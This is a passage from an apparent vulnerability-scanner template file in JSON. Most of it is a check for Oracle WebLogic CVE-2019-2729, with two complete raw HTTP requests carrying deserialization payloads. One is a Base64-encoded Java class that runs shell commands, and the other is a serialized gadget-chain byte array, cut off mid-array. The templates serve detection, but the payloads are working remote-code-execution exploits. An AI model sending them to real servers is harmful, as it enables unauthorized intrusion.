Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/osm/REGISTER.cmd","{{BaseURL}}/osm_tiles/REGISTER.cmd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DEBUGMAPSCRIPT=TRUE","@echo off"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2729","info":{"name":"Oracle WebLogic Server Administration Console - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA[<java><void class=\"sun.misc.BASE64Decoder\"><void method=\"decodeBuffer\" id=\"byte_arr\"><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class=\"org.mozilla.classfile.DefiningClassLoader\"><void method=\"defineClass\"><string>ResultBaseExec</string><object idref=\"byte_arr\"></object><void method=\"newInstance\"><void method=\"do_exec\" id=\"result\"><string>echo${IFS}COP-9272-9102-EVC|rev</string></void></void></void></void><void class=\"java.lang.Thread\" method=\"currentThread\"><void method=\"getCurrentWork\" id=\"current_work\"><void method=\"getClass\"><void method=\"getDeclaredField\"><string>connectionHandler</string><void method=\"setAccessible\"><boolean>true</boolean></void><void method=\"get\"><object idref=\"current_work\"></object><void method=\"getServletRequest\"><void method=\"getResponse\"><void method=\"getServletOutputStream\"><void method=\"writeStream\"><object class=\"weblogic.xml.util.StringInputStream\"><object idref=\"result\"></object></object></void><void method=\"flush\"/></void><void method=\"getWriter\"><void method=\"write\"><string></string></void></void></void></void></void></void></void></void></void></java>]]></string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n","POST /_async/AsyncResponseService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><array method=\"forName\"><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void><array class=\"byte\" length=\"3478\"><void index=\"0\"><byte>-84</byte></void><void index=\"1\"><byte>-19</byte></void><void index=\"2\"><byte>0</byte></void><void index=\"3\"><byte>5</byte></void><void index=\"4\"><byte>115</byte></void><void index=\"5\"><byte>114</byte></void><void index=\"6\"><byte>0</byte></void><void index=\"7\"><byte>23</byte></void><void index=\"8\"><byte>106</byte></void><void index=\"9\"><byte>97</byte></void><void index=\"10\"><byte>118</byte></void><void index=\"11\"><byte>97</byte></void><void index=\"12\"><byte>46</byte></void><void index=\"13\"><byte>117</byte></void><void index=\"14\"><byte>116</byte></void><void index=\"15\"><byte>105</byte></void><void index=\"16\"><byte>108</byte></void><void index=\"17\"><byte>46</byte></void><void index=\"18\"><byte>76</byte></void><void index=\"19\"><byte>105</byte></void><void index=\"20\"><byte>110</byte></void><void index=\"21\"><byte>107</byte></void><void index=\"22\"><byte>101</byte></void><void index=\"23\"><byte>100</byte></void><void index=\"24\"><byte>72</byte></void><void index=\"25\"><byte>97</byte></void><void index=\"26\"><byte>115</byte></void><void index=\"27\"><byte>104</byte></void><void index=\"28\"><byte>83</byte></void><void index=\"29\"><byte>101</byte></void><void index=\"30\"><byte>116</byte></void><void index=\"31\"><byte>-40</byte></void><void index=\"32\"><byte>108</byte></void><void index=\"33\"><byte>-41</byte></void><void index=\"34\"><byte>90</byte></void><void index=\"35\"><byte>-107</byte></void><void index=\"36\"><byte>-35</byte></void><void index=\"37\"><byte>42</byte></void><void index=\"38\"><byte>30</byte></void><void index=\"39\"><byte>2</byte></void><void index=\"40\"><byte>0</byte></void><void index=\"41\"><byte>0</byte></void><void index=\"42\"><byte>120</byte></void><void index=\"43\"><byte>114</byte></void><void index=\"44\"><byte>0</byte></void><void index=\"45\"><byte>17</byte></void><void index=\"46\"><byte>106</byte></void><void index=\"47\"><byte>97</byte></void><void index=\"48\"><byte>118</byte></void><void index=\"49\"><byte>97</byte></void><void index=\"50\"><byte>46</byte></void><void index=\"51\"><byte>117</byte></void><void index=\"52\"><byte>116</byte></void><void index=\"53\"><byte>105</byte></void><void index=\"54\"><byte>108</byte></void><void index=\"55\"><byte>46</byte></void><void index=\"56\"><byte>72</byte></void><void index=\"57\"><byte>97</byte></void><void index=\"58\"><byte>115</byte></void><void index=\"59\"><byte>104</byte></void><void index=\"60\"><byte>83</byte></void><void index=\"61\"><byte>101</byte></void><void index=\"62\"><byte>116</byte></void><void index=\"63\"><byte>-70</byte></void><void index=\"64\"><byte>68</byte></void><void index=\"65\"><byte>-123</byte></void><void index=\"66\"><byte>-107</byte></void><void index=\"67\"><byte>-106</byte></void><void index=\"68\"><byte>-72</byte></void><void index=\"69\"><byte>-73</byte></void><void index=\"70\"><byte>52</byte></void><void index=\"71\"><byte>3</byte></void><void index=\"72\"><byte>0</byte></void><void index=\"73\"><byte>0</byte></void><void index=\"74\"><byte>120</byte></void><void index=\"75\"><byte>112</byte></void><void index=\"76\"><byte>119</byte></void><void index=\"77\"><byte>12</byte></void><void index=\"78\"><byte>0</byte></void><void index=\"79\"><byte>0</byte></void><void index=\"80\"><byte>0</byte></void><void index=\"81\"><byte>16</byte></void><void index=\"82\"><byte>63</byte></void><void index=\"83\"><byte>64</byte></void><void index=\"84\"><byte>0</byte></void><void index=\"85\"><byte>0</byte></void><void index=\"86\"><byte>0</byte></void><void index=\"87\"><byte>0</byte></void><void index=\"88\"><byte>0</byte></void><void index=\"89\"><byte>2</byte></void><void index=\"90\"><byte>115</byte></void><void index=\"91\"><byte>114</byte></void><void index=\"92\"><byte>0</byte></void><void index=\"93\"><byte>58</byte></void><void index=\"94\"><byte>99</byte></void><void index=\"95\"><byte>111</byte></void><void index=\"96\"><byte>109</byte></void><void index=\"97\"><byte>46</byte></void><void index=\"98\"><byte>115</byte></void><void index=\"99\"><byte>117</byte></void><void index=\"100\"><byte>110</byte></void><void index=\"101\"><byte>46</byte></void><void index=\"102\"><byte>111</byte></void><void index=\"103\"><byte>114</byte></void><void index=\"104\"><byte>103</byte></void><void index=\"105\"><byte>46</byte></void><void index=\"106\"><byte>97</byte></void><void index=\"107\"><byte>112</byte></void><void index=\"108\"><byte>97</byte></void><void index=\"109\"><byte>99</byte></void><void index=\"110\"><byte>104</byte></void><void index=\"111\"><byte>101</byte></void><void index=\"112\"><byte>46</byte></void><void index=\"113\"><byte>120</byte></void><void index=\"114\"><byte>97</byte></void><void index=\"115\"><byte>108</byte></void><void index=\"116\"><byte>97</byte></void><void index=\"117\"><byte>110</byte></void><void index=\"118\"><byte>46</byte></void><void index=\"119\"><byte>105</byte></void><void index=\"120\"><byte>110</byte></void><void index=\"121\"><byte>116</byte></void><void index=\"122\"><byte>101</byte></void><void index=\"123\"><byte>114</byte></void><void index=\"124\"><byte>110</byte></void><void index=\"125\"><byte>97</byte></void><void index=\"126\"><byte>108</byte></void><void index=\"127\"><byte>46</byte></void><void index=\"128\"><byte>120</byte></void><void index=\"129\"><byte>115</byte></void><void index=\"130\"><byte>108</byte></void><void index=\"131\"><byte>116</byte></void><void index=\"132\"><byte>99</byte></void><void index=\"133\"><byte>46</byte></void><void index=\"134\"><byte>116</byte></void><void index=\"135\"><byte>114</byte></void><void index=\"136\"><byte>97</byte></void><void index=\"137\"><byte>120</byte></void><void index=\"138\"><byte>46</byte></void><void index=\"139\"><byte>84</byte></void><void index=\"140\"><byte>101</byte></void><void index=\"141\"><byte>109</byte></void><void index=\"142\"><byte>112</byte></void><void index=\"143\"><byte>108</byte></void><void index=\"144\"><byte>97</byte></void><void index=\"145\"><byte>116</byte></void><void index=\"146\"><byte>101</byte></void><void index=\"147\"><byte>115</byte></void><void index=\"148\"><byte>73</byte></void><void index=\"149\"><byte>109</byte></void><void index=\"150\"><byte>112</byte></void><void index=\"151\"><byte>108</byte></void><void index=\"152\"><byte>9</byte></void><void index=\"153\"><byte>87</byte></void><void index=\"154\"><byte>79</byte></void><void index=\"155\"><byte>-63</byte></void><void index=\"156\"><byte>110</byte></void><void index=\"157\"><byte>-84</byte></void><void index=\"158\"><byte>-85</byte></void><void index=\"159\"><byte>51</byte></void><void index=\"160\"><byte>3</byte></void><void index=\"161\"><byte>0</byte></void><void index=\"162\"><byte>6</byte></void><void index=\"163\"><byte>73</byte></void><void index=\"164\"><byte>0</byte></void><void index=\"165\"><byte>13</byte></void><void index=\"166\"><byte>95</byte></void><void index=\"167\"><byte>105</byte></void><void index=\"168\"><byte>110</byte></void><void index=\"169\"><byte>100</byte></void><void index=\"170\"><byte>101</byte></void><void index=\"171\"><byte>110</byte></void><void index=\"172\"><byte>116</byte></void><void index=\"173\"><byte>78</byte></void><void index=\"174\"><byte>117</byte></void><void index=\"175\"><byte>109</byte></void><void index=\"176\"><byte>98</byte></void><void index=\"177\"><byte>101</byte></void><void index=\"178\"><byte>114</byte></void><void index=\"179\"><byte>73</byte></void><void index=\"180\"><byte>0</byte></void><void index=\"181\"><byte>14</byte></void><void index=\"182\"><byte>95</byte></void><void index=\"183\"><byte>116</byte></void><void index=\"184\"><byte>114</byte></void><void index=\"185\"><byte>97</byte></void><void index=\"186\"><byte>110</byte></void><void index=\"187\"><byte>115</byte></void><void index=\"188\"><byte>108</byte></void><void index=\"189\"><byte>101</byte></void><void index=\"190\"><byte>116</byte></void><void index=\"191\"><byte>73</byte></void><void index=\"192\"><byte>110</byte></void><void index=\"193\"><byte>100</byte></void><void index=\"194\"><byte>101</byte></void><void index=\"195\"><byte>120</byte></void><void index=\"196\"><byte>91</byte></void><void index=\"197\"><byte>0</byte></void><void index=\"198\"><byte>10</byte></void><void index=\"199\"><byte>95</byte></void><void index=\"200\"><byte>98</byte></void><void index=\"201\"><byte>121</byte></void><void index=\"202\"><byte>116</byte></void><void index=\"203\"><byte>101</byte></void><void index=\"204\"><byte>99</byte></void><void index=\"205\"><byte>111</byte></void><void index=\"206\"><byte>100</byte></void><void index=\"207\"><byte>101</byte></void><void index=\"208\"><byte>115</byte></void><void index=\"209\"><byte>116</byte></void><void index=\"210\"><byte>0</byte></void><void index=\"211\"><byte>3</byte></void><void index=\"212\"><byte>91</byte></void><void index=\"213\"><byte>91</byte></void><void index=\"214\"><byte>66</byte></void><void index=\"215\"><byte>91</byte></void><void index=\"216\"><byte>0</byte></void><void index=\"217\"><byte>6</byte></void><void index=\"218\"><byte>95</byte></void><void index=\"219\"><byte>99</byte></void><void index=\"220\"><byte>108</byte></void><void index=\"221\"><byte>97</byte></void><void index=\"222\"><byte>115</byte></void><void index=\"223\"><byte>115</byte></void><void index=\"224\"><byte>116</byte></void><void index=\"225\"><byte>0</byte></void><void index=\"226\"><byte>18</byte></void><void index=\"227\"><byte>91</byte></void><void index=\"228\"><byte>76</byte></void><void index=\"229\"><byte>106</byte></void><void index=\"230\"><byte>97</byte></void><void index=\"231\"><byte>118</byte></void><void index=\"232\"><byte>97</byte></void><void index=\"233\"><byte>47</byte></void><void index=\"234\"><byte>108</byte></void><void index=\"235\"><byte>97</byte></void><void index=\"236\"><byte>110</byte></void><void index=\"237\"><byte>103</byte></void><void index=\"238\"><byte>47</byte></void><void index=\"239\"><byte>67</byte></void><void index=\"240\"><byte>108</byte></void><void index=\"241\"><byte>97</byte></void><void index=\"242\"><byte>115</byte></void><void index=\"243\"><byte>115</byte></void><void index=\"244\"><byte>59</byte></void><void index=\"245\"><byte>76</byte></void><void index=\"246\"><byte>0</byte></void><void index=\"247\"><byte>5</byte></void><void index=\"248\"><byte>95</byte></void><void index=\"249\"><byte>110</byte></void><void index=\"250\"><byte>97</byte></void><void index=\"251\"><byte>109</byte></void><void index=\"252\"><byte>101</byte></void><void index=\"253\"><byte>116</byte></void><void index=\"254\"><byte>0</byte></void><void index=\"255\"><byte>18</byte></void><void index=\"256\"><byte>76</byte></void><void index=\"257\"><byte>106</byte></void><void index=\"258\"><byte>97</byte></void><void index=\"259\"><byte>118</byte></void><void index=\"260\"><byte>97</byte></void><void index=\"261\"><byte>47</byte></void><void index=\"262\"><byte>108</byte></void><void index=\"263\"><byte>97</byte></void><void index=\"264\"><byte>110</byte></void><void index=\"265\"><byte>103</byte></void><void index=\"266\"><byte>47</byte></void><void index=\"267\"><byte>83</byte></void><void index=\"268\"><byte>116</byte></void><void index=\"269\"><byte>114</byte></void><void index=\"270\"><byte>105</byte></void><void index=\"271\"><byte>110</byte></void><void index=\"272\"><byte>103</byte></void><void index=\"273\"><byte>59</byte></void><void index=\"274\"><byte>76</byte></void><void index=\"275\"><byte>0</byte></void><void index=\"276\"><byte>17</byte></void><void index=\"277\"><byte>95</byte></void><void index=\"278\"><byte>111</byte></void><void index=\"279\"><byte>117</byte></void><void index=\"280\"><byte>116</byte></void><void index=\"281\"><byte>112</byte></void><void index=\"282\"><byte>117</byte></void><void index=\"283\"><byte>116</byte></void><void index=\"284\"><byte>80</byte></void><void index=\"285\"><byte>114</byte></void><void index=\"286\"><byte>111</byte></void><void index=\"287\"><byte>112</byte></void><void index=\"288\"><byte>101</byte></void><void index=\"289\"><byte>114</byte></void><void index=\"290\"><byte>116</byte></void><void index=\"291\"><byte>105</byte></void><void index=\"292\"><byte>101</byte></void><void index=\"293\"><byte>115</byte></void><void index=\"294\"><byte>116</byte></void><void index=\"295\"><byte>0</byte></void><void index=\"296\"><byte>22</byte></void><void index=\"297\"><byte>76</byte></void><void index=\"298\"><byte>106</byte></void><void index=\"299\"><byte>97</byte></void><void index=\"300\"><byte>118</byte></void><void index=\"301\"><byte>97</byte></void><void index=\"302\"><byte>47</byte></void><void index=\"303\"><byte>117</byte></void><void index=\"304\"><byte>116</byte></void><void index=\"305\"><byte>105</byte></void><void index=\"306\"><byte>108</byte></void><void index=\"307\"><byte>47</byte></void><void index=\"308\"><byte>80</byte></void><void index=\"309\"><byte>114</byte></void><void index=\"310\"><byte>111</byte></void><void index=\"311\"><byte>112</byte></void><void index=\"312\"><byte>101</byte></void><void index=\"313\"><byte>114</byte></void><void index=\"314\"><byte>116</byte></void><void index=\"315\"><byte>105</byte></void><void index=\"316\"><byte>101</byte></void><void index=\"317\"><byte>115</byte></void><void index=\"318\"><byte>59</byte></void><void index=\"319\"><byte>120</byte></void><void index=\"320\"><byte>112</byte></void><void index=\"321\"><byte>0</byte></void><void index=\"322\"><byte>0</byte></void><void index=\"323\"><byte>0</byte></void><void index=\"324\"><byte>0</byte></void><void index=\"325\"><byte>-1</byte></void><void index=\"326\"><byte>-1</byte></void><void index=\"327\"><byte>-1</byte></void><void index=\"328\"><byte>-1</byte></void><void index=\"329\"><byte>117</byte></void><void index=\"330\"><byte>114</byte></void><void index=\"331\"><byte>0</byte></void><void index=\"332\"><byte>3</byte></void><void index=\"333\"><byte>91</byte></void><void index=\"334\"><byte>91</byte></void><void index=\"335\"><byte>66</byte></void><void index=\"336\"><byte>75</byte></void><void index=\"337\"><byte>-3</byte></void><void index=\"338\"><byte>25</byte></void><void index=\"339\"><byte>21</byte></void><void index=\"340\"><byte>103</byte></void><void index=\"341\"><byte>103</byte></void><void index=\"342\"><byte>-37</byte></void><void index=\"343\"><byte>55</byte></void><void index=\"344\"><byte>2</byte></void><void index=\"345\"><byte>0</byte></void><void index=\"346\"><byte>0</byte></void><void index=\"347\"><byte>120</byte></void><void index=\"348\"><byte>112</byte></void><void index=\"349\"><byte>0</byte></void><void index=\"350\"><byte>0</byte></void><void index=\"351\"><byte>0</byte></void><void index=\"352\"><byte>2</byte></void><void index=\"353\"><byte>117</byte></void><void index=\"354\"><byte>114</byte></void><void index=\"355\"><byte>0</byte></void><void index=\"356\"><byte>2</byte></void><void index=\"357\"><byte>91</byte></void><void index=\"358\"><byte>66</byte></void><void index=\"359\"><byte>-84</byte></void><void index=\"360\"><byte>-13</byte></void><void index=\"361\"><byte>23</byte></void><void index=\"362\"><byte>-8</byte></void><void index=\"363\"><byte>6</byte></void><void index=\"364\"><byte>8</byte></void><void index=\"365\"><byte>84</byte></void><void index=\"366\"><byte>-32</byte></void><void index=\"367\"><byte>2</byte></void><void index=\"368\"><byte>0</byte></void><void index=\"369\"><byte>0</byte></void><void index=\"370\"><byte>120</byte></void><void index=\"371\"><byte>112</byte></void><void index=\"372\"><byte>0</byte></void><void index=\"373\"><byte>0</byte></void><void index=\"374\"><byte>8</byte></void><void index=\"375\"><byte>-82</byte></void><void index=\"376\"><byte>-54</byte></void><void index=\"377\"><byte>-2</byte></void><void index=\"378\"><byte>-70</byte></void><void index=\"379\"><byte>-66</byte></void><void index=\"380\"><byte>0</byte></void><void index=\"381\"><byte>0</byte></void><void index=\"382\"><byte>0</byte></void><void index=\"383\"><byte>50</byte></void><void index=\"384\"><byte>0</byte></void><void index=\"385\"><byte>99</byte></void><void index=\"386\"><byte>10</byte></void><void index=\"387\"><byte>0</byte></void><void index=\"388\"><byte>3</byte></void><void index=\"389\"><byte>0</byte></void><void index=\"390\"><byte>34</byte></void><void index=\"391\"><byte>7</byte></void><void index=\"392\"><byte>0</byte></void><void index=\"393\"><byte>97</byte></void><void index=\"394\"><byte>7</byte></void><void index=\"395\"><byte>0</byte></void><void index=\"396\"><byte>37</byte></void><void index=\"397\"><byte>7</byte></void><void index=\"398\"><byte>0</byte></void><void index=\"399\"><byte>38</byte></void><void index=\"400\"><byte>1</byte></void><void index=\"401\"><byte>0</byte></void><void index=\"402\"><byte>16</byte></void><void index=\"403\"><byte>115</byte></void><void index=\"404\"><byte>101</byte></void><void index=\"405\"><byte>114</byte></void><void index=\"406\"><byte>105</byte></void><void index=\"407\"><byte>97</byte></void><void index=\"408\"><byte>108</byte></void><void index=\"409\"><byte>86</byte></void><void index=\"410\"><byte>101</byte></void><void index=\"411\"><byte>114</byte></void><void index=\"412\"><byte>115</byte></void><void index=\"413\"><byte>105</byte></void><void index=\"414\"><byte>111</byte></void><void index=\"415\"><byte>110</byte></void><void index=\"416\"><byte>85</byte></void><void index=\"417\"><byte>73</byte></void><void index=\"418\"><byte>68</byte></void><void index=\"419\"><byte>1</byte></void><void index=\"420\"><byte>0</byte></void><void index=\"421\"><byte>1</byte></void><void index=\"422\"><byte>74</byte></void><void index=\"423\"><byte>1</byte></void><void index=\"424\"><byte>0</byte></void><void index=\"425\"><byte>13</byte></void><void index=\"426\"><byte>67</byte></void><void index=\"427\"><byte>111</byte></void><void index=\"428\"><byte>110</byte></void><void index=\"429\"><byte>115</byte></void><void index=\"430\"><byte>116</byte></void><void index=\"431\"><byte>97</byte></void><void index=\"432\"><byte>110</byte></void><void index=\"433\"><byte>116</byte></void><void index=\"434\"><byte>86</byte></void><void index=\"435\"><byte>97</byte></void><void index=\"436\"><byte>108</byte></void><void index=\"437\"><byte>117</byte></void><void index=\"438\"><byte>101</byte></void><void index=\"439\"><byte>5</byte></void><void index=\"440\"><byte>-83</byte></void><void index=\"441\"><byte>32</byte></void><void index=\"442\"><byte>-109</byte></void><void index=\"443\"><byte>-13</byte></void><void index=\"444\"><byte>-111</byte></void><void index=\"445\"><byte>-35</byte></void><void index=\"446\"><byte>-17</byte></void><void index=\"447\"><byte>62</byte></void><void index=\"448\"><byte>1</byte></void><void index=\"449\"><byte>0</byte></void><void index=\"450\"><byte>6</byte></void><void index=\"451\"><byte>60</byte></void><void index=\"452\"><byte>105</byte></void><void index=\"453\"><byte>110</byte></void><void index=\"454\"><byte>105</byte></void><void index=\"455\"><byte>116</byte></void><void index=\"456\"><byte>62</byte></void><void index=\"457\"><byte>1</byte></void><void index=\"458\"><byte>0</byte></void><void index=\"459\"><byte>3</byte></void><void index=\"460\"><byte>40</byte></void><void index=\"461\"><byte>41</byte></void><void index=\"462\"><byte>86</byte></void><void index=\"463\"><byte>1</byte></void><void index=\"464\"><byte>0</byte></void><void index=\"465\"><byte>4</byte></void><void index=\"466\"><byte>67</byte></void><void index=\"467\"><byte>111</byte></void><void index=\"468\"><byte>100</byte></void><void index=\"469\"><byte>101</byte></void><void index=\"470\"><byte>1</byte></void><void index=\"471\"><byte>0</byte></void><void index=\"472\"><byte>15</byte></void><void index=\"473\"><byte>76</byte></void><void index=\"474\"><byte>105</byte></void><void index=\"475\"><byte>110</byte></void><void index=\"476\"><byte>101</byte></void><void index=\"477\"><byte>78</byte></void><void index=\"478\"><byte>117</byte></void><void index=\"479\"><byte>109</byte></void><void index=\"480\"><byte>98</byte></void><void index=\"481\"><byte>101</byte></void><void index=\"482\"><byte>114</byte></void><void index=\"483\"><byte>84</byte></void><void index=\"484\"><byte>97</byte></void><void index=\"485\"><byte>98</byte></void><void index=\"486\"><byte>108</byte></void><void index=\"487\"><byte>101</byte></void><void index=\"488\"><byte>1</byte></void><void index=\"489\"><byte>0</byte></void><void index=\"490\"><byte>18</byte></void><void index=\"491\"><byte>76</byte></void><void index=\"492\"><byte>111</byte></void><void index=\"493\"><byte>99</byte></void><void index=\"494\"><byte>97</byte></void><void index=\"495\"><byte>108</byte></void><void index=\"496\"><byte>86</byte></void><void index=\"497\"><byte>97</byte></void><void index=\"498\"><byte>114</byte></void><void index=\"499\"><byte>105</byte></void><void index=\"500\"><byte>97</byte></void><void index=\"501\"><byte>98</byte></void><void index=\"502\"><byte>108</byte></void><void index=\"503\"><byte>101</byte></void><void index=\"504\"><byte>84</byte></void><void index=\"505\"><byte>97</byte></void><void index=\"506\"><byte>98</byte></void><void index=\"507\"><byte>108</byte></void><void index=\"508\"><byte>101</byte></void><void index=\"509\"><byte>1</byte></void><void index=\"510\"><byte>0</byte></void><void index=\"511\"><byte>4</byte></void><void index=\"512\"><byte>116</byte></void><void index=\"513\"><byte>104</byte></void><void index=\"514\"><byte>105</byte></void><void index=\"515\"><byte>115</byte></void><void index=\"516\"><byte>1</byte></void><void index=\"517\"><byte>0</byte></void><void index=\"518\"><byte>19</byte></void><void index=\"519\"><byte>83</byte></void><void index=\"520\"><byte>116</byte></void><void index=\"521\"><byte>117</byte></void><void index=\"522\"><byte>98</byte></void><void index=\"523\"><byte>84</byte></void><void index=\"524\"><byte>114</byte></void><void index=\"525\"><byte>97</byte></void><void index=\"526\"><byte>110</byte></void><void index=\"527\"><byte>115</byte></void><void index=\"528\"><byte>108</byte></void><void index=\"529\"><byte>101</byte></void><void index=\"530\"><byte>116</byte></void><void index=\"531\"><byte>80</byte></void><void index=\"532\"><byte>97</byte></void><void index=\"533\"><byte>121</byte></void><void index=\"534\"><byte>108</byte></void><void index=\"535\"><byte>111</byte></void><void index=\"536\"><byte>97</byte></void><void index=\"537\"><byte>100</byte></void><void index=\"538\"><byte>1</byte></void><void index=\"539\"><byte>0</byte></void><void index=\"540\"><byte>12</byte></void><void index=\"541\"><byte>73</byte></void><void index=\"542\"><byte>110</byte></void><void index=\"543\"><byte>110</byte></void><void index=\"544\"><byte>101</byte></void><void index=\"545\"><byte>114</byte></void><void index=\"546\"><byte>67</byte></void><void index=\"547\"><byte>108</byte></void><void index=\"548\"><byte>97</byte></void><void index=\"549\"><byte>115</byte></void><void index=\"550\"><byte>115</byte></void><void index=\"551\"><byte>101</byte></void><void index=\"552\"><byte>115</byte></void><void index=\"553\"><byte>1</byte></void><void index=\"554\"><byte>0</byte></void><void index=\"555\"><byte>53</byte></void><void index=\"556\"><byte>76</byte></void><void index=\"557\"><byte>121</byte></void><void index=\"558\"><byte>115</byte></void><void index=\"559\"><byte>111</byte></void><void index=\"560\"><byte>115</byte></void><void index=\"561\"><byte>101</byte></void><void index=\"562\"><byte>114</byte></void><void index=\"563\"><byte>105</byte></void><void index=\"564\"><byte>97</byte></void><void index=\"565\"><byte>108</byte></void><void index=\"566\"><byte>47</byte></void><void index=\"567\"><byte>112</byte></void><void index=\"568\"><byte>97</byte></void><void index=\"569\"><byte>121</byte></void><void index=\"570\"><byte>108</byte></void><void index=\"571\"><byte>111</byte></void><void index=\"572\"><byte>97</byte></void><void index=\"573\"><byte>100</byte></void><void index=\"574\"><byte>115</byte></void><void index=\"575\"><byte>47</byte></void><void index=\"576\"><byte>117</byte></void><void index=\"577\"><byte>116</byte></void><void index=\"578\"><byte>105</byte></void><void index=\"579\"><byte>108</byte></void><void index=\"580\"><byte>47</byte></void><void index=\"581\"><byte>71</byte></void><void index=\"582\"><byte>97</byte></void><void index=\"583\"><byte>100</byte></void><void index=\"584\"><byte>103</byte></void><void index=\"585\"><byte>101</byte></void><void index=\"586\"><byte>116</byte></void><void index=\"587\"><byte>115</byte></void><void index=\"588\"><byte>36</byte></void><void index=\"589\"><byte>83</byte></void><void index=\"590\"><byte>116</byte></void><void index=\"591\"><byte>117</byte></void><void index=\"592\"><byte>98</byte></void><void 